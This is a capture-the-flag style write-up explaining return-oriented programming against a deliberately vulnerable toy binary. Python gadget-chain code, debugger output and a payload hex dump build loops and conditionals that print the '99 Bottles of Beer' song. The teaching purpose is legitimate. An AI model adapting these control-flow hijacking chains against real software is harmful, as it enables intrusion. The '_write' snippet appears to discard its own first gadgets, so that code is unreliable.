# Return-oriented Programming

[TOC]

## Introduction

*"Return-oriented programming (ROP) is a computer security exploit technique that allows an attacker to execute code in the presence of security defenses such as executable space protection and code signing.*

*In this technique, an attacker gains control of the call stack to hijack program control flow and then executes carefully chosen machine instruction sequences that are already present in the machine's memory, called 'gadgets'. Each gadget typically ends in a return instruction and is located in a subroutine within the existing program and/or shared library code. Chained together, these gadgets allow an attacker to perform arbitrary operations on a machine employing defenses that thwart simpler attacks"*, says [Wikipedia](https://en.wikipedia.org/wiki/Return-oriented_programming).

While this exploiting technique is usually used to gain shell access from a vulnerable programs it ROP is generally Turing complete as long the vulnerable program is complex enough. In this case the challenge was to persuade a rather simple application insisting it does not like beer to print out the "99 Bottles of Beer" lyrics.

```bash
$ ./vuln                
Do you want me to sing a beer song? [Y/N] y
"La la, bottles of beer on the wall, la la. Take one down and pass it around, la la ..." 

Nah, I don't like beer!
```

The program is intendedly vulnerable against ROP by allowing the user to enter a much longer input string than it handles:

```bash
$ ./vuln                                                                                           
Do you want me to sing a beer song? [Y/N] lalalalala
Segmentation fault
```

To make things easier, the input is read from `stdin` using `read(STDIN_FILENO, buf, INT_MAX)`: the payload has almost no length limit and potially bad characters (such as `\0\r\n`) are no problem as well.  Additionally the program is linked statically so I can use any `libc`-gadgets without needing to worry about [Address Space Layout Randomization](https://en.wikipedia.org/wiki/Address_space_layout_randomization).

## Finding Gadgets

The main task in ROP is finding instructions within the vulnerable program that do what you want and `ret` afterwards to the next required instruction – called "gadgets". Writing static text to `stdout` is rather simple:

```python
def _write(addr: int, len: int) -> bytes:
    """ Write `len` characters of the content of `addr` to stdout """
    res  = pack("<Q", 0x000000000040a942)   # pop rsi; ret;
    res += pack("<Q", addr)                 # buf
    res += pack("<Q", 0x000000000045d9f7)   # pop rdx; pop rbx; ret;
    res += pack("<Q", len)                  # len(buf)
    res += pack("<Q", 0xbee2bee2bee2bee2)   # junk
    res += _write_rsi()
    # ssize_t write(int fd, const void *buf, size_t count);
    res  = pack("<Q", 0x0000000000402191)   # pop rdi; ret;
    res += pack("<Q", 1)                    # fd = stdout
    res += pack("<Q", 0x000000000041e5d7)   # pop rax; ret;
    res += pack("<Q", 1)                    # syscall write
    res += pack("<Q", 0x000000000040fe22)   # syscall; ret;
    return res
```

```bash
$ r2 -2 -qq -c "iz~No" vuln
210  0x00077164 0x00477164 25  26   .rodata      ascii   No such file or directory
[...]
```
`_write(0x00477164, 3)` therefore writes "No " to `stdout`.[^1]

### Loop

Since every song verse is almost the same, the main challenge is building a loop. Conditional or unconditional assembler jumps won't help here, since the program flow is defined solely by return addresses on the stack. A loop therefore needs to "jump" back on the stack. This is done by saving the stack pointer `rsp` in any "free" variable in the `.bss` section of the program – here `char* answer` – just after initializing the count variable:

```python
def _save_loop_rsp() -> bytes:
    """ Save `rsp` at position after this call to `answer` """
    res  = pack("<Q", 0x000000000041e5d7)   # pop rax; ret;
    res += pack("<Q", 0x0000000000401012)   # add rsp, 8; ret;
    res += pack("<Q", 0x000000000042bd6c)   # lea  r8, [rsp + 0x90]; call rax;
    res += pack("<Q", 0x000000000041cc24)   # mov rax, r8; vzeroupper; ret;
    res += pack("<Q", 0x0000000000402191)   # pop rdi; ret;
    res += pack("<Q", 0x58)
    res += pack("<Q", 0x000000000041ca38)   # sub rax, rdi; ret;
    res += pack("<Q", 0x000000000040a942)   # pop rsi; ret;
    res += pack("<Q", 0x00000000004a4b18)   # rsi = @answer
    res += pack("<Q", 0x000000000041ff01)   # mov qword ptr [rsi], rax; ret;
    return res
```

Right after writing a verse I can "jump" back by setting `rsp` to the saved address:

```python
def _load_loop_rsp() -> bytes:
    """ Load `rsp` from `answer` """
    res  = pack("<Q", 0x000000000040a942)   # pop rsi; ret;
    res += pack("<Q", 0x00000000004a4b18)   # rsi = @answer
    res += pack("<Q", 0x0000000000402191)   # pop rdi; ret;
    res += pack("<Q", 0x00000000004a4b18)   # rsi = @answer
    res += pack("<Q", 0x000000000044bd30)   # mov rcx, qword ptr [rsi]; mov byte ptr [rdi + 8], dh; mov qword ptr [rdi], rcx; ret;
    res += pack("<Q", 0x000000000046fd8f)   # mov rsp, rcx; pop rcx; jmp rcx;   # jump to loop header
    return res
```

### Saving the Loop Counter

While a "usual" assembler program would save the loop counter in a register or push it onto the stack, both are rather hard in ROP: registers are often changed and gadgets for rather unused registers are hard to find and any change of the stack might destroy the program flow on the stack I need to preserve for the next loop. I therefore decided to use another free `.bss` variable: `int sing`. This way I can "pop" the loop counter to `rdx` anytime I need.

### Print the Loop Counter

While printing static text is easy the loop counter is a changing integer value. First I tried to simply `printf("%d", rdx)` the value. However, `printf` "trampled down" my stack by writing arbitrary data onto it what resulted in segmentation faults every next loop iteration. Luckily the `libc` function `_itoa_word` doesn't need the stack when converting my integer value to a string. I even managed to calculate the resulting length (one or two characters) to hand it to the `write` syscall.

### if Statements

A good 99 bottles program prints grammatically correct verses and therefore `1 bottle of beer` instead of `1 bottles` and `No more bottles` instead of `0 bottles`. This however, requires any kind of `if` statement. As said before, it's not a simple conditional jump in assembler. I, however, found a gadget with a conditional return:

```nasm
$ r2 -A vuln
[0x00401760]> s 0x000000000042104d
[0x0042104d]> pd 50
┌───< 0x0042104d      7411           je 0x421060
│╎╎   0x0042104f      488d7c3158     lea rdi, [rcx + rsi + 0x58]
│╎╎   0x00421054      ffe2           jmp rdx
│╎╎   0x00421056      662e0f1f84..   nop word cs:[rax + rax]
└───> 0x00421060      c3             ret
```

This gadget returns if the zero flag is set in the `rflags` register (`je`) and jumps to `rdx` otherwise. All I have to do is to compare (or subtract) to registers. If they are equal the gadget returns to the next gadget. If not it jumps to `rdx` that points to another gadget that increases `rsp` to point to the gadget on the stack after the `if` part.

```python
def _exit_if_zero() -> bytes:
    """ Exit vuln if loop var == 0. """
    res  = _load_rdx_from_loop_var()
    # if rdx == 0: exit(); else add rsp, 0x28 (= jump over exit)
    res += pack("<Q", 0x000000000041b801)   # mov rax, rdx; ret;
    res += pack("<Q", 0x000000000045d9f7)   # pop rdx; pop rbx; ret;
    res += pack("<Q", 0)                    # rdx = 0                   # compare rax with rdx
    res += pack("<Q", 0xbee2bee2bee2bee2)   # junk
    res += pack("<Q", 0x0000000000404905)   # sub rax, rdx; ret;        # if-condition
    res += pack("<Q", 0x000000000045d9f7)   # pop rdx; pop rbx; ret;
    res += pack("<Q", 0x0000000000404913)   # add rsp, 0x28; ret;       # else branch (jmp after exit)
    res += pack("<Q", 0xbee2bee2bee2bee2)   # junk
    res += pack("<Q", 0x000000000042104d)   # je 0x21060 (= ret); lea rdi, [rcx + rsi + 0x58]; jmp rdx;
    res += _exit()                          # exit(0)                   # if branch
    return res;
```

If I'd require a "jump not zero" it's just another `add rsp` to "jump" *to* the required gadget and the other one "jumping" *after* it:

```python
def _write_s_if_one() -> bytes:
    """ Write `s` if loop var != 1. """
    res  = _load_rdx_from_loop_var()
    # if rdx == 1: add rsp, 0x58 (= jump over exit); else write("s")
    res += pack("<Q", 0x000000000041b801)   # mov rax, rdx; ret;
    res += pack("<Q", 0x000000000045d9f7)   # pop rdx; pop rbx; ret;
    res += pack("<Q", 1)                    # rdx = 1                   # compare rax with rdx
    res += pack("<Q", 0xbee2bee2bee2bee2)   # junk
    res += pack("<Q", 0x0000000000404905)   # sub rax, rdx; ret;        # if-condition
    res += pack("<Q", 0x000000000045d9f7)   # pop rdx; pop rbx; ret;
    res += pack("<Q", 0x0000000000401012)   # add rsp, 8; ret;          # else branch (jmp to write)
    res += pack("<Q", 0xbee2bee2bee2bee2)   # junk
    res += pack("<Q", 0x000000000042104d)   # je 0x21060 (= ret); lea rdi, [rcx + rsi + 0x58]; jmp rdx;
    res += pack("<Q", 0x000000000041e6e4)   # add rsp, 0x58; ret;       # if branch (jmp after write)
    res += _write(0x0047604e, 1)            # write("s")
    res += pack("<Q", 0x00000000004017bf)   # nop; ret;
    return res;
```

## Exploiting the vulnerable program

First we need to find the offset of the return address of the `ask` function. `pwndbg`'s `cyclic` function comes in handy here:

```bash
$ pwndbg vuln
pwndbg> cyclic 200 /dev/shm/payload
Written a cyclic sequence of length 200 to file /dev/shm/payload

pwndbg> r < /dev/shm/payload
Starting program: /media/ctf/rop-chains/vuln < /dev/shm/payload
Do you want me to sing a beer song? [Y/N] 
Program received signal SIGSEGV, Segmentation fault.
[...]
00:0000│ rsp 0x7fffffffdcd8 ◂— 'aaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaa'

pwndbg> cyclic -l aaaaaaca
Finding cyclic pattern of 8 bytes: b'aaaaaaca' (hex: 0x6161616161616361)
Found at offset 10
```

## Singing the song

```bash
$ ./vuln
Do you want me to sing a beer song? [Y/N] y
"La la, bottles of beer on the wall, la la. Take one down and pass it around, la la ..." 

Nah, I don't like beer!

$ ./vuln
Do you want me to sing a beer song? [Y/N] n
OK, I'll be quiet.

$ ./create-payload.py

$ wc -c payload
3130 payload

$ xxd payload
00000000: 4141 4141 4141 4141 4141 42a9 4000 0000  AAAAAAAAAAB.@...
00000010: 0000 9a60 4700 0000 0000 f7d9 4500 0000  ...`G.......E...
00000020: 0000 0100 0000 0000 0000 e2be e2be e2be  ................
00000030: e2be 9121 4000 0000 0000 0100 0000 0000  ...!@...........
00000040: 0000 d7e5 4100 0000 0000 0100 0000 0000  ....A...........
00000050: 0000 22fe 4000 0000 0000 42a9 4000 0000  ..".@.....B.@...
00000060: 0000 9a60 4700 0000 0000 f7d9 4500 0000  ...`G.......E...
00000070: 0000 0100 0000 0000 0000 e2be e2be e2be  ................
00000080: e2be 9121 4000 0000 0000 0100 0000 0000  ...!@...........
00000090: 0000 d7e5 4100 0000 0000 0100 0000 0000  ....A...........
[...]

$ cat payload | ./vuln
Do you want me to sing a beer song? [Y/N] 

99 bottles of beer on the wall,
99 bottles of beer.
Take one down and pass it around,
98 bottles of beer on the wall.

[...]

10 bottles of beer on the wall,
10 bottles of beer.
Take one down and pass it around,
9 bottles of beer on the wall.

9 bottles of beer on the wall,
9 bottles of beer.
Take one down and pass it around,
8 bottles of beer on the wall.

8 bottles of beer on the wall,
8 bottles of beer.
Take one down and pass it around,
7 bottles of beer on the wall.

7 bottles of beer on the wall,
7 bottles of beer.
Take one down and pass it around,
6 bottles of beer on the wall.

6 bottles of beer on the wall,
6 bottles of beer.
Take one down and pass it around,
5 bottles of beer on the wall.

5 bottles of beer on the wall,
5 bottles of beer.
Take one down and pass it around,
4 bottles of beer on the wall.

4 bottles of beer on the wall,
4 bottles of beer.
Take one down and pass it around,
3 bottles of beer on the wall.

3 bottles of beer on the wall,
3 bottles of beer.
Take one down and pass it around,
2 bottles of beer on the wall.

2 bottles of beer on the wall,
2 bottles of beer.
Take one down and pass it around,
1 bottle of beer on the wall.

1 bottle of beer on the wall,
1 bottle of beer.
Take one down and pass it around,
No more bottles of beer on the wall.
```

[^1]: Since piecing the song lyrics together from `libc` would cause nothing but lengthen the resulting exploit without adding any "magic", I made `vuln` contain the main line by making it saying "La la, bottles of beer on the wall, la la. Take one down and pass it around, la la ..."